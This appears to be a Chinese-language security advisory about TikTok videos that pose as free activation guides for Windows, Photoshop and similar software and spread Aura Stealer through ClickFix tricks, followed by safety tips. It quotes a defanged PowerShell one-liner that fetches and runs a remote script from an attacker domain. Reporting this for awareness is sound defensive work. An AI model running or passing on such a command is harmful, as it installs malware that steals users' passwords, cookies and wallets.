TikTok 視頻仍在通過 ClickFix 攻擊傳播 Infostealer 惡意軟件
網絡犯罪分子利用 TikTok 視頻來欺騙人們,這些視頻看起來像是 Windows、Spotify 和 Netflix 等流行軟件的免費激活指南,但實際上傳播的是竊取您信息的惡意軟件。
這些假視頻聲稱展示瞭如何激活 Windows、Microsoft 365、Photoshop 和 Discord Nitro 等內容,但其真正目的是感染觀眾的設備。
怎麼了?
這些視頻使用 ClickFix 攻擊,這是一種社會工程技巧,看起來像是一個有用的修復程序,但實際上誘使用戶運行有害的 PowerShell 命令或腳本來安裝惡意軟件。
每個視頻都會顯示一個快速的單行命令,並指導觀看者以管理員身份在 PowerShell 中輸入該命令。
他們讓它們運行如下所示的腳本命令。
iex (irm slmgr[.]win/photoshop)
這些假視頻中顯示的 URL 會根據被模擬的軟件而變化,因此 Windows 激活詐騙將使用其中包含“windows”而不是“photoshop”的鏈接。當用戶運行推薦的命令時,PowerShell 連接到遠程站點 (slmgr[.]win) 以獲取並執行更多惡意腳本。
該腳本從 Cloudflare 頁面下載兩個文件,第一個文件(“updater.exe”)是 Aura Stealer,它會獲取瀏覽器密碼、cookie、加密錢包和應用程序憑據,然後將它們上傳給攻擊者。
還下載了第二個文件(“source.exe”),該文件編譯更多惡意代碼並在內存中啟動它。
如何保持安全?
-
除非您完全信任源,否則切勿將從網站複製的命令直接運行到 PowerShell、命令提示符、文件資源管理器地址欄、Mac 或 Linux 終端中。
-
請始終從軟件的真實網站尋求官方支持或更新。
-
檢查 HTTPS 和域拼寫:在下載任何內容之前,查找“https://”並仔細檢查網站地址的拼寫。
-
開啟雙因素身份驗證:為您的帳戶添加額外的保護,因此即使您的密碼被盜,攻擊者也無法輕鬆登錄。
-
備份重要數據:保留重要文件的副本,以防惡意軟件導致數據丟失或鎖定。
